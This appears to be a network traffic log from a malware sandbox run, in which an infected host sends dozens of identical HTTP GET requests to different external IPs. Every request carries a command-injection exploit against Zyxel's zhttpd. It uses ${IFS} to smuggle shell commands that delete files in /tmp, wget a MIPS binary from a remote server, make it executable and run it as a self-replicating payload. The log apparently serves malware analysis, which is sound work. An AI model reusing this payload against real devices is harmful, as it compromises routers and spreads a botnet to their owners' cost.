                                                  Jan 19, 2024 18:24:02.192907095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6016192.168.2.1337746142.162.156.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.192940950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6017192.168.2.133383085.151.175.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193000078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6018192.168.2.1348734148.175.50.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193041086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6019192.168.2.1341422167.140.216.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193072081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6020192.168.2.1340652123.78.160.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193105936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6021192.168.2.134070460.180.174.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193165064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6022192.168.2.135156460.111.82.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193205118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6023192.168.2.135297873.218.189.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193233967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6024192.168.2.135596645.52.236.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193279982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6025192.168.2.1333082125.146.248.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193310022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6026192.168.2.135576045.242.65.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193367958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6027192.168.2.1352650202.191.28.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193387032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6028192.168.2.1333944148.200.150.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193413973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6029192.168.2.135010454.85.31.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193455935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6030192.168.2.134302638.86.154.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193491936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6031192.168.2.1344394129.148.69.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193526983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6032192.168.2.1339202213.124.217.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193593979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6033192.168.2.1334348144.190.49.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193624020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6034192.168.2.1334758100.136.251.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193669081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6035192.168.2.1345896120.146.98.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193698883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6036192.168.2.134547067.91.137.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193758965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6037192.168.2.1333554182.91.229.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193788052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6038192.168.2.135446854.136.154.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193846941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6039192.168.2.1335226175.201.53.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193873882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6040192.168.2.1358932178.226.34.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193907022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6041192.168.2.135352672.214.41.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.193943977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6042192.168.2.13578345.163.52.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194003105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6043192.168.2.1348614174.200.210.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194036007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6044192.168.2.133579099.196.136.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194067001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6045192.168.2.1336290185.60.65.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194118977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6046192.168.2.1339842159.153.50.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194152117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6047192.168.2.1358556152.33.15.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194185972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6048192.168.2.133769443.22.22.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194235086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6049192.168.2.135842047.43.20.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194293022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6050192.168.2.134265225.94.195.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194339991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6051192.168.2.1341206146.37.141.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194382906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6052192.168.2.1347890180.23.177.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194432020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6053192.168.2.133844240.110.55.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194456100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6054192.168.2.134816052.251.76.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194498062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6055192.168.2.1339304187.11.99.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194531918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6056192.168.2.135916057.136.39.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194574118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6057192.168.2.1335616202.146.109.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194596052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6058192.168.2.1355948221.128.7.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194634914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6059192.168.2.1348488204.151.220.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194703102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6060192.168.2.13343441.78.89.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194730043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6061192.168.2.134806483.221.41.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194791079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6062192.168.2.1349756122.54.77.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194840908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6063192.168.2.135846695.151.230.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194849968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6064192.168.2.1356896180.67.92.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194876909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6065192.168.2.1355548158.220.236.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194921017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6066192.168.2.1359590112.103.107.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.194967031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6067192.168.2.1344284190.191.74.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195005894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6068192.168.2.135808220.36.51.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195055008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6069192.168.2.133659064.216.246.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195082903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6070192.168.2.133940488.128.51.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195118904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6071192.168.2.134375057.58.241.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195172071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6072192.168.2.1337318144.113.229.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195207119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6073192.168.2.134070472.107.128.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195267916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6074192.168.2.1349362209.36.218.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195297956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6075192.168.2.1356494203.143.64.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195329905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6076192.168.2.1352508192.157.0.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195364952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6077192.168.2.1335264219.31.143.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:02.195393085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6078192.168.2.135505879.47.138.80443
                                                  TimestampBytes transferredDirectionData
